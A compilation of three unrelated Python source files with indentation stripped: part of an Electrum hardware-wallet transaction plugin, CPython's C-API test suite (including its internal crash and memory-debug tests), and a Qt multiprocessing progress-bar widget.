if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args, env=None):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
if env is not None and sys.platform == 'win32':
# Windows requires at least the SYSTEMROOT environment variable to
# start Python.
env = env.copy()
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def run_repeated_init_and_subinterpreters(self):
out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
self.assertEqual(err, "")
# The output from _testembed looks like this:
# --- Pass 0 ---
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
# interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
# interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# --- Pass 1 ---
# ...
interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
r"thread state <(0x[\dA-F]+)>: "
r"id\(modules\) = ([\d]+)$")
Interp = namedtuple("Interp", "id interp tstate modules")
numloops = 0
current_run = []
for line in out.splitlines():
if line == "--- Pass {} ---".format(numloops):
self.assertEqual(len(current_run), 0)
if support.verbose:
print(line)
numloops += 1
continue
self.assertLess(len(current_run), 5)
match = re.match(interp_pat, line)
if match is None:
self.assertRegex(line, interp_pat)
# Parse the line from the loop. The first line is the main
# interpreter and the 3 afterward are subinterpreters.
interp = Interp(*match.groups())
if support.verbose:
print(interp)
self.assertTrue(interp.interp)
self.assertTrue(interp.tstate)
self.assertTrue(interp.modules)
current_run.append(interp)
# The last line in the loop should be the same as the first.
if len(current_run) == 5:
main = current_run[0]
self.assertEqual(interp, main)
yield current_run
current_run = []
def test_subinterps_main(self):
for run in self.run_repeated_init_and_subinterpreters():
main = run[0]
self.assertEqual(main.id, '0')
def test_subinterps_different_ids(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
mainid = int(main.id)
for i, sub in enumerate(subs):
self.assertEqual(sub.id, str(mainid + i + 1))
def test_subinterps_distinct_state(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
if '0x0' in main:
# XXX Fix on Windows (and other platforms): something
# is going on with the pointers in Programs/_testembed.c.
# interp.interp is 0x0 and interp.modules is the same
# between interpreters.
raise unittest.SkipTest('platform prints pointers as 0x0')
for sub in subs:
# A new subinterpreter may have the same
# PyInterpreterState pointer as a previous one if
# the earlier one has already been destroyed. So
# we compare with the main interpreter. The same
# applies to tstate.
self.assertNotEqual(sub.interp, main.interp)
self.assertNotEqual(sub.tstate, main.tstate)
self.assertNotEqual(sub.modules, main.modules)
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
if support.verbose > 1:
print()
print(out)
print(err)
expected_stream_encoding = "utf-8"
expected_errors = "surrogateescape"
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stream_encoding,
out_encoding=expected_stream_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format, keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format, keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# Test handling errors in the parse_tuple_and_keywords helper itself
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [42])
def test_bad_use(self):
# Test handling invalid format and keywords in
# PyArg_ParseTupleAndKeywords()
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '||O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1, 2), {}, '|O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$$O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$|O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|OO', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|$O', [''])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|OO', ['a', ''])
def test_positional_only(self):
parse = _testcapi.parse_tuple_and_keywords
parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
parse((1,), {}, 'O|OO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|OO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes exactly 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
parse((1,), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
parse((1,), {}, 'O|$OO', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, 'Empty keyword'):
parse((1,), {}, 'O|OO', ['', 'a', ''])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
@unittest.skipUnless(threading, 'Test requires a GIL (multithreading)')
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
progress_bar.py | # -*- coding: utf-8 -*-
import sys, time
from qtpy import QtCore, QtGui, QtWidgets
from multiprocessing import Process, Queue, cpu_count, Pipe
import os
import numpy as np
__all__ = []
tic=time.time()
class ProcessLauncher(QtCore.QThread):
status_update=QtCore.Signal(str)
def __init__(self,parent):
QtCore.QThread.__init__(self)
self.parent=parent
self.nCores=parent.nCores
def __del__(self):
self.wait()
def run(self):
p=self.parent
nCores=self.nCores
for i in range(nCores):
self.status_update.emit('Creating process {}/{}'.format(i+1,nCores))
q_result=Queue()
q_progress=Queue()
q_status=Queue()
parent_conn, child_conn=Pipe()
p.q_results.append(q_result)
p.q_progress.append(q_progress)
p.q_status.append(q_status)
p.pipes.append(parent_conn)
p.processes.append(Process(target=p.outerfunc, args=(q_result, q_progress, q_status, child_conn, p.args )))
started=[False for i in range(nCores)]
for i in range(nCores):
if p.stopPressed:
break
self.status_update.emit('Initializing process {}/{}'.format(i+1,nCores))
p.processes[i].start()
started[i]=True
for i in range(nCores):
if started[i]:
if not p.stopPressed:
self.status_update.emit('Sending data to process {}/{}'.format(i+1,nCores))
tic=time.time()
p.pipes[i].send(p.data[i])
#print('Time it took to send data: {}'.format(time.time()-tic))
for i in range(nCores):
if started[i]:
if not p.stopPressed:
self.status_update.emit('Starting process {}/{}'.format(i+1,nCores))
p.q_status[i].put('Start')
else:
p.q_status[i].put('Stop')
else: #if the the process was never started
p.process_finished[i]=True
self.status_update.emit(p.msg)
class ProgressBar(QtWidgets.QWidget):
finished_sig=QtCore.Signal()
def __init__(self, outerfunc, data, args, nCores, msg='Performing Operations', parent=None ):
super(ProgressBar, self).__init__(parent)
self.outerfunc=outerfunc
self.data=data
self.args=args
self.nCores=nCores
self.msg=msg
# GUI
self.label=QtWidgets.QLabel(msg)
#self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.progress_bars=[]
self.button = QtWidgets.QPushButton('Stop')
self.button.clicked.connect(self.handleButton)
main_layout = QtWidgets.QGridLayout()
main_layout.addWidget(self.label,0,0)
main_layout.addWidget(self.button, 0, 1)
for i in range(nCores):
bar=QtWidgets.QProgressBar()
bar.setMinimum(1)
bar.setMaximum(100)
main_layout.addWidget(bar, 1+i, 0)
self.progress_bars.append(bar)
self.setLayout(main_layout)
self.setWindowTitle(msg)
self.stopPressed = False
self.show()
QtWidgets.qApp.processEvents()
self.results=[None for i in range(nCores)]
self.process_finished=[False for i in range(nCores)]
self.q_results=[]
self.q_progress=[]
self.q_status=[]
self.pipes=[]
self.processes=[]
self.processLauncher=ProcessLauncher(self)
self.processLauncher.status_update.connect(self.status_updated)
self.processLauncher.start()
self.timer=QtCore.QTimer()
self.timer.timeout.connect(self.check_if_finished)
self.timer.start(50)
self.loop = QtCore.QEventLoop()
self.finished=False
self.finished_sig.connect(self.loop.quit)
self.finished_sig.connect(self.update_finished_status)
self.loop.exec_() # This blocks until the "finished" signal is emitted
while self.finished is False: #the exec_() loop doesn't wait for loop.quit when running in spyder for some reason. This is the workaround
time.sleep(.01)
QtWidgets.qApp.processEvents()
self.close()
def check_if_finished(self):
for i in range(len(self.q_progress)):
if not self.q_progress[i].empty():
while not self.q_progress[i].empty():
percent=self.q_progress[i].get()
self.progress_bars[i].setValue(percent)
if not self.q_results[i].empty():
self.progress_bars[i].setValue(100)
self.results[i]=self.q_results[i].get()
self.process_finished[i]=True
self.processes[i].join(1)
QtWidgets.qApp.processEvents()
if all(self.process_finished):
if any(r is None for r in self.results):
self.results=None
self.timer.timeout.disconnect()
self.finished_sig.emit()
if self.stopPressed:
#print('STOPPPPP')
for i in range(self.nCores):
self.q_status[i].put('Stop')
def handleButton(self):
self.stopPressed=True
def status_updated(self,msg):
self.label.setText(msg)
def update_finished_status(self):
self.finished=True
def clear_memory(self):
for child in self.children():
child.deleteLater()
for attr in dir(self):
try:
delattr(self, attr)
except Exception:
pass
def clear_memory(self):
for child in self.children():
child.deleteLater()
for attr in dir(self):
try:
delattr(self, attr)
except Exception:
pass
# def closeEvent(self, event):
# for child in self.findChildren(QtGui.QDialog):
# if child is not widget:
# child.deleteLater()
#
# if self.closed:
# print('This window was already closed')
# event.accept()
# else:
# self.closeSignal.emit()
# if hasattr(self,'image'):
# del self.image
# self.imageview.setImage(np.zeros((2,2))) #clear the memory
# self.imageview.close()
# del self.imageview
# g.m.setWindowTitle("flika")
# if g.win==self:
# g.win=None
# if self in g.windows:
# g.windows.remove(self)
# self.closed=True
# event.accept() # let the window close
'''
